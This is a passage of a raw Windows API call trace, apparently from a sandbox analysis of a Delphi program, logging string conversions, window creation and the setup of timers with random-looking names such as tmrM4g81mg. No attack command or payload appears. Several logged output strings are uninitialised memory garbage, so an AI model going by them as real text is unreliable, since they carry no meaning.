CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x71d1668, cchWideChar=4 | out: lpWideCharStr="Left2") returned 4 [0039.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x71d1668, cchWideChar=3 | out: lpWideCharStr="Topt2") returned 3 [0039.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="TTimerೠܝ\x02") returned 6 [0039.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=10, lpWideCharStr=0x71ca318, cchWideChar=10 | out: lpWideCharStr="tmrM4g81mg\x01") returned 10 [0039.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.699] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡\x1c\x07çF\x95u<¡\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.699] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.699] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x60140 [0039.700] SetWindowLongW (hWnd=0x60140, nIndex=-4, dwNewLong=83758970) returned 112917644 [0039.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM4g81mg", cchWideChar=10, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM4g81mg", lpUsedDefaultChar=0x0) returned 10 [0039.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e017c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca33c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.700] KillTimer (hWnd=0x60140, uIDEvent=0x1) returned 0 [0039.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x71ca2d8, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0039.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval8", lpUsedDefaultChar=0x0) returned 8 [0039.700] KillTimer (hWnd=0x60140, uIDEvent=0x1) returned 0 [0039.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.700] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e01a4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=15, lpWideCharStr=0x71e6d88, cchWideChar=15 | out: lpWideCharStr="tmrM4g81mgTimerr") returned 15 [0039.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM4g81mgTimer", cchWideChar=15, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM4g81mgTimer\x0f", lpUsedDefaultChar=0x0) returned 15 [0039.701] KillTimer (hWnd=0x60140, uIDEvent=0x1) returned 0 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x71d1680, cchWideChar=4 | out: lpWideCharStr="Left杭") returned 4 [0039.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x71d1680, cchWideChar=3 | out: lpWideCharStr="Topt杭") returned 3 [0039.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca138, cbMultiByte=18, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca138, cbMultiByte=18, lpWideCharStr=0x71e6de8, cchWideChar=18 | out: lpWideCharStr="TApplicationEvents") returned 18 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca138, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca138, cbMultiByte=19, lpWideCharStr=0x71fc488, cchWideChar=19 | out: lpWideCharStr="ApplicationMEvents1") returned 19 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca13c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.701] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TApplicationEvents", cchCount2=18) returned 3 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6ca4767, cbMultiByte=6, lpWideCharStr=0x71ca13c, cchWideChar=7 | out: lpWideCharStr="TLabel") returned 6 [0039.701] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TLabel", cchCount1=6, lpString2="TApplicationEvents", cchCount2=18) returned 3 [0039.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6db508f, cbMultiByte=18, lpWideCharStr=0x71fc48c, cchWideChar=19 | out: lpWideCharStr="TApplicationEvents") returned 18 [0039.701] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TApplicationEvents", cchCount1=18, lpString2="TApplicationEvents", cchCount2=18) returned 2 [0039.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ä\x1f\x07çF\x95uTÄ\x1f\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ApplicationMEvents1", cchWideChar=19, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ApplicationMEvents1", lpUsedDefaultChar=0x0) returned 19 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=11, lpWideCharStr=0x71e01c8, cchWideChar=11 | out: lpWideCharStr="OnException") returned 11 [0039.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnException", cchWideChar=11, lpMultiByteStr=0x71fc48c, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnException", lpUsedDefaultChar=0x0) returned 11 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71e0218, cbMultiByte=28, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71e0218, cbMultiByte=28, lpWideCharStr=0x71edc98, cchWideChar=28 | out: lpWideCharStr="ApplicationMEvents1Exception") returned 28 [0039.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ApplicationMEvents1Exception", cchWideChar=28, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ApplicationMEvents1Exception°Quéý", lpUsedDefaultChar=0x0) returned 28 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1668, cchWideChar=4 | out: lpWideCharStr="Left潩n\x01") returned 4 [0039.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Left", lpUsedDefaultChar=0x0) returned 4 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1668, cchWideChar=3 | out: lpWideCharStr="Topt潩n\x01") returned 3 [0039.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="TTimerೠܝ\x02") returned 6 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=14, lpWideCharStr=0x71e01c8, cchWideChar=14 | out: lpWideCharStr="tmr3nv14M8ConfȑܞҰ\x02") returned 14 [0039.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.702] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.702] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.702] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x30154 [0039.703] SetWindowLongW (hWnd=0x30154, nIndex=-4, dwNewLong=83758957) returned 112917644 [0039.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmr3nv14M8Conf", cchWideChar=14, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmr3nv14M8Conf", lpUsedDefaultChar=0x0) returned 14 [0039.703] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.703] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e01cc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca35c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.704] KillTimer (hWnd=0x30154, uIDEvent=0x1) returned 0 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x71ca318, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0039.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval8", lpUsedDefaultChar=0x0) returned 8 [0039.704] KillTimer (hWnd=0x30154, uIDEvent=0x1) returned 0 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e01f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca338, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca338, cbMultiByte=19, lpWideCharStr=0x71fc450, cchWideChar=19 | out: lpWideCharStr="tmr3nv14M8ConfTimers") returned 19 [0039.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmr3nv14M8ConfTimer", cchWideChar=19, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmr3nv14M8ConfTimer\x13", lpUsedDefaultChar=0x0) returned 19 [0039.704] KillTimer (hWnd=0x30154, uIDEvent=0x1) returned 0 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1680, cchWideChar=4 | out: lpWideCharStr="Leftp") returned 4 [0039.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1680, cchWideChar=3 | out: lpWideCharStr="Toptp") returned 3 [0039.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="tmrM8LGer") returned 7 [0039.704] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.704] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.704] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.704] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x500fe [0039.705] SetWindowLongW (hWnd=0x500fe, nIndex=-4, dwNewLong=83758944) returned 112917644 [0039.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8LG", cchWideChar=7, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8LG", lpUsedDefaultChar=0x0) returned 7 [0039.705] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.705] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e01f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca37c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.705] KillTimer (hWnd=0x500fe, uIDEvent=0x1) returned 0 [0039.705] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=8, lpWideCharStr=0x71ca298, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0039.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval", lpUsedDefaultChar=0x0) returned 8 [0039.706] KillTimer (hWnd=0x500fe, uIDEvent=0x1) returned 0 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e01cc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=12, lpWideCharStr=0x71e01c8, cchWideChar=12 | out: lpWideCharStr="tmrM8LGTimer") returned 12 [0039.706] WideCharToMultiByte 